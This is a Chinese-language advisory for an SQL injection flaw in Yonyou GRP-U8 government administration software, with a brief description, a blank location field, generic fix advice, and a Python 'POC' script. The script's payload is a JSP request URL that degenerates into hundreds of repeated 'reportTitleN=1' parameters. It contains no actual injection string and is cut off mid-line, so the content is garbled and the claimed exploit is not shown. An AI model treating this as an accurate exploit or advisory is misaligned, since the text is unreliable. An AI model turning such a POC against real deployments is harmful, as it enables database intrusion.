漏洞概述 漏洞名称: 用友GRP-U8 行政事业管理软件 SQL注入漏洞 漏洞类型: SQL注入 漏洞描述: 用友GRP-U8行政事业管理软件存在SQL注入漏洞,攻击者可以通过构造恶意请求获取数据库中的敏感信息。 影响范围 受影响版本: 用友GRP-U8行政事业管理软件 漏洞位置: 修复方案 修复建议: 对输入参数进行严格的过滤和验证,防止恶意SQL语句的执行。 补丁信息: 暂无官方补丁,建议联系用友软件获取最新修复方案。 POC代码 ```python import requests import sys def check_vulnerability(url): payload = "/defaultroot/portal/realtimeReport/queryRealtimeReportData.jsp?reportId=1&reportName=1&reportType=1&reportFormat=1&reportTitle=1&reportTitle2=1&reportTitle3=1&reportTitle4=1&reportTitle5=1&reportTitle6=1&reportTitle7=1&reportTitle8=1&reportTitle9=1&reportTitle10=1&reportTitle11=1&reportTitle12=1&reportTitle13=1&reportTitle14=1&reportTitle15=1&reportTitle16=1&reportTitle17=1&reportTitle18=1&reportTitle19=1&reportTitle20=1&reportTitle21=1&reportTitle22=1&reportTitle23=1&reportTitle24=1&reportTitle25=1&reportTitle26=1&reportTitle27=1&reportTitle28=1&reportTitle29=1&reportTitle30=1&reportTitle31=1&reportTitle32=1&reportTitle33=1&reportTitle34=1&reportTitle35=1&reportTitle36=1&reportTitle37=1&reportTitle38=1&reportTitle39=1&reportTitle40=1&reportTitle41=1&reportTitle42=1&reportTitle43=1&reportTitle44=1&reportTitle45=1&reportTitle46=1&reportTitle47=1&reportTitle48=1&reportTitle49=1&reportTitle50=1&reportTitle51=1&reportTitle52=1&reportTitle53=1&reportTitle54=1&reportTitle55=1&reportTitle56=1&reportTitle57=1&reportTitle58=1&reportTitle59=1&reportTitle60=1&reportTitle61=1&reportTitle62=1&reportTitle63=1&reportTitle64=1&reportTitle65=1&reportTitle66=1&reportTitle67=1&reportTitle68=1&reportTitle69=1&reportTitle70=1&reportTitle71=1&reportTitle72=1&reportTitle73=1&reportTitle74=1&reportTitle75=1&reportTitle76=1&reportTitle77=1&reportTitle78=1&reportTitle79=1&reportTitle80=1&reportTitle81=1&reportTitle82=1&reportTitle83=1&reportTitle84=1&reportTitle85=1&reportTitle86=1&reportTitle87=1&reportTitle88=1&reportTitle89=1&reportTitle90=1&reportTitle91=1&reportTitle92=1&reportTitle93=1&reportTitle94=1&reportTitle95=1&reportTitle96=1&reportTitle97=1&reportTitle98=1&reportTitle99=1&reportTitle100=1&reportTitle101=1&reportTitle102=1&reportTitle103=1&reportTitle104=1&reportTitle105=1&reportTitle106=1&reportTitle107=1&reportTitle108=1&reportTitle109=1&reportTitle110=1&reportTitle111=1&reportTitle112=1&reportTitle113=1&reportTitle114=1&reportTitle115=1&reportTitle116=1&reportTitle117=1&reportTitle118=1&reportTitle119=1&reportTitle120=1&reportTitle121=1&reportTitle122=1&reportTitle123=1&reportTitle124=1&reportTitle125=1&reportTitle126=1&reportTitle127=1&reportTitle128=1&reportTitle129=1&reportTitle130=1&reportTitle131=1&reportTitle132=1&reportTitle133=1&reportTitle134=1&reportTitle135=1&reportTitle136=1&reportTitle137=1&reportTitle138=1&reportTitle139=1&reportTitle140=1&reportTitle141=1&reportTitle142=1&reportTitle143=1&reportTitle144=1&reportTitle145=1&reportTitle146=1&reportTitle147=1&reportTitle148=1&reportTitle149=1&reportTitle150=1&reportTitle151=1&reportTitle152=1&reportTitle153=1&reportTitle154=1&reportTitle155=1&reportTitle156=1&reportTitle157=1&reportTitle158=1&reportTitle159=1&reportTitle160=1&reportTitle161=1&reportTitle162=1&reportTitle163=1&reportTitle164=1&reportTitle165=1&reportTitle166=1&reportTitle167=1&reportTitle168=1&reportTitle169=1&reportTitle170=1&reportTitle171=1&reportTitle172=1&reportTitle173=1&reportTitle174=1&reportTitle175=1&reportTitle176=1&reportTitle177=1&reportTitle178=1&reportTitle179=1&reportTitle180=1&reportTitle181=1&reportTitle182=1&reportTitle183=1&reportTitle184=1&reportTitle185=1&reportTitle186=1&reportTitle187=1&reportTitle188=1&reportTitle189=1&reportTitle190=1&reportTitle191=1&reportTitle192=1&reportTitle193=1&reportTitle194=1&reportTitle195=1&reportTitle196=1&reportTitle197=1&reportTitle198=1&reportTitle199=1&reportTitle200=1&reportTitle201=1&reportTitle202=1&reportTitle203=1&reportTitle204=1&reportTitle205=1&reportTitle206=1&reportTitle207=1&reportTitle208=1&reportTitle209=1&reportTitle210=1&reportTitle211=1&reportTitle212=1&reportTitle213=1&reportTitle214=1&reportTitle215=1&reportTitle216=1&reportTitle217=1&reportTitle218=1&reportTitle219=1&reportTitle220=1&reportTitle221=1&reportTitle222=1&reportTitle223=1&reportTitle224=1&reportTitle225=1&reportTitle226=1&reportTitle227=1&reportTitle228=1&reportTitle229=1&reportTitle230=1&reportTitle231=1&reportTitle232=1&reportTitle233=1&reportTitle234=1&reportTitle235=1&reportTitle236=1&reportTitle237=1&reportTitle238=1&reportTitle239=1&reportTitle240=1&reportTitle241=1&reportTitle242=1&reportTitle243=1&reportTitle244=1&reportTitle245=1&reportTitle246=1&reportTitle247=1&reportTitle248=1&reportTitle249=1&reportTitle250=1&reportTitle251=1&reportTitle252=1&reportTitle253=1&reportTitle254=1&reportTitle255=1&reportTitle256=1&reportTitle257=1&reportTitle258=1&reportTitle259=1&reportTitle260=1&reportTitle261=1&reportTitle262=1&reportTitle263=1&reportTitle264=1&reportTitle265=1&reportTitle266=1&reportTitle267=1&reportTitle268=1&reportTitle269=1&reportTitle270=1&reportTitle271=1&reportTitle272=1&reportTitle273=1&reportTitle274=1&reportTitle275=1&reportTitle276=1&repo